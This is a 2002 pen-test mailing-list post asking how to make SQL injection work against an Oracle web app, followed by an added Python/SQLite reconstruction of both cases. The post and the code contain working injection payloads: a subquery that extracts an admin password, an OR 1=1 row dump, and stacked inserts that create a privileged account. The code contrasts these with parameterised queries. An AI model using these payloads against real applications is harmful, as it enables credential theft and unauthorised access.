SQL Injection

From: Qyves (zqyves@netscape.net)
Date: 06/11/02


Date: Tue, 11 Jun 2002 04:30:48 -0400
From: zqyves@netscape.net (Qyves)
To: pen-test@securityfocus.com

Hello all,

Last time this was denied on pen-test due to cross-posting issues.

I am currently pen-testing a web app and I am stuck in trying to execute two queries sequentially in Oracle.

To my knowledge I can do this in SQL by separating the two queries with ';', however this is not happening in my case in two circumstances...

Here goes the history:

Case1:

I have discovered an injectable SQL query that is fed its data from a web form, the end query built by a cgi-script being something along these lines:

(insert into tab_nam values ('a','b','c','d','e')); - a-e values from the web form - with me being able to inject, through concatenation and subqueries between any of those fields, a SELECT query.

e.g.
e='||select password from users where username='adm'||'
query=(insert into tab_nam values ('a','b','c','d',''||select password from users where username='adm'||''));

I tried an INSERT to no avail, fair enough since I don't think that INSERTs are allowed in nested queries... (or are they??)

The last characters added by the cgi script are the ));

e.g.
e=aa')); (insert into powerusers values ('test', 'pwd
 ^^-- This gets around the NULL value insertion problem
query=(insert into tab_nam values ('a','b','c','d','aa')); (insert into powerusers values ('test', 'pwd'));

Those two queries should be executed sequentially but Oracle complains with an Invalid character error.

Case 2:

I have also found a second query I can insert into, and parts of it are actually shown raw in the URL as an input to a servlet script, e.g. /stupid.cgi?A=123%20AND%20%ID=101

This query appears to be something in the form of:
SELECT foo from bar where [URL] ;

I can inject an OR 1=1 in the above URL and get all the rows... However, when I try the sequential queries again I fail miserably.

url=/stupid.cgi?A=123%20AND%20%ID=101%20OR%201=1

original url=/stupidservlet?A=123%20AND%20%ID=101
modified url=/stupidservlet?A=123%20AND%20%ID=101; insert into powerusers values ('test', 'pwd)

I have full control over the url however I get just a "Server Error" back.

Any clues on how to make any of these methods work anyone??

Thanks in advance.

Qyves
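An added example, not part of the post or its thread, reconstructing both cases against SQLite as a stand-in for the Oracle back end. Table and column names follow the post where it gives them; the schema, the sample rows, the reconstructed CGI statement builder and the bind-placeholder variant are assumptions. It shows three things: a scalar subquery spliced into the string literal does pull a value from another table through the string-built INSERT (the subquery has to be parenthesised, which the payload in the post omits); the same payload is stored inertly when the statement is sent with bind placeholders; and a single-statement execute call refuses a ';'-separated second statement before anything runs, so the appended INSERT never executes. Python's sqlite3 module refuses by raising an error; Oracle's rejection of the ';' in the statement text is consistent with the invalid-character error the post reports.

```python
import sqlite3

# Constructed sample schema (not from the post). SQLite stands in for Oracle;
# names follow the post where it gives them.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('adm', 's3cret');
INSERT INTO users VALUES ('bob', 'hunter2');
CREATE TABLE tab_nam (a TEXT, b TEXT, c TEXT, d TEXT, e TEXT);
CREATE TABLE powerusers (name TEXT, pwd TEXT);
CREATE TABLE bar (foo TEXT, A INTEGER, ID INTEGER);
INSERT INTO bar VALUES ('row1', 123, 101);
INSERT INTO bar VALUES ('row2', 124, 102);
INSERT INTO bar VALUES ('row3', 125, 103);
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_insert(fields):
    """Hypothetical reconstruction of the CGI's string building: each form
    value is wrapped in single quotes and pasted into the statement text."""
    return "insert into tab_nam values (" + ", ".join("'%s'" % f for f in fields) + ")"


def run_one(conn, sql, params=None):
    """Execute one statement and report whether the driver accepted it.
    sqlite3 refuses text that holds more than one statement and raises
    before executing any of it (Warning on older Pythons, ProgrammingError
    on newer ones)."""
    try:
        conn.execute(sql, params or ())
        conn.commit()
        return True
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return False


def case1(payload, parameterized):
    """Case 1 from the post: field e carries the payload. Returns
    (accepted, value stored in e, number of powerusers rows)."""
    conn = fresh_db()
    fields = ["a", "b", "c", "d", payload]
    if parameterized:
        # Bind placeholders: the value travels as data, not as SQL text.
        accepted = run_one(conn, "insert into tab_nam values (?, ?, ?, ?, ?)", fields)
    else:
        accepted = run_one(conn, build_insert(fields))
    row = conn.execute("select e from tab_nam").fetchone()
    stored = row[0] if row else None
    powerusers = conn.execute("select count(*) from powerusers").fetchone()[0]
    return accepted, stored, powerusers


# Close the literal, concatenate a parenthesised scalar subquery, reopen it.
SUBQUERY_PAYLOAD = "'||(select password from users where username='adm')||'"
# Terminate the INSERT and append a second statement after a ';'.
STACKED_PAYLOAD = "aa'); insert into powerusers values ('test', 'pwd"


def case2(where_fragment):
    """Case 2 from the post: the URL value lands in a WHERE clause. Returns
    the number of rows yielded, or None if the driver rejected the text."""
    conn = fresh_db()
    try:
        rows = conn.execute("SELECT foo from bar where " + where_fragment).fetchall()
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return None
    return len(rows)


if __name__ == "__main__":
    print(case1(SUBQUERY_PAYLOAD, parameterized=False))  # (True, 's3cret', 0)
    print(case1(SUBQUERY_PAYLOAD, parameterized=True))   # (True, <payload text>, 0)
    print(case1(STACKED_PAYLOAD, parameterized=False))   # (False, None, 0)
    print(case1(STACKED_PAYLOAD, parameterized=True))    # (True, <payload text>, 0)
    print(case2("A=123 AND ID=101"))                     # 1
    print(case2("A=123 AND ID=101 OR 1=1"))              # 3
    print(case2("A=123 AND ID=101; insert into powerusers values ('test', 'pwd')"))  # None
```

The subquery route works because the injected text is parsed as part of the expression in the VALUES list, so anything a scalar subquery can return is written into the row the attacker controls. The stacking route fails at a different layer: the statement-execution API accepts one statement, so the text is rejected as a whole and the first INSERT does not run either, which is why the mechanism cannot be coaxed into working by adjusting the quoting.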
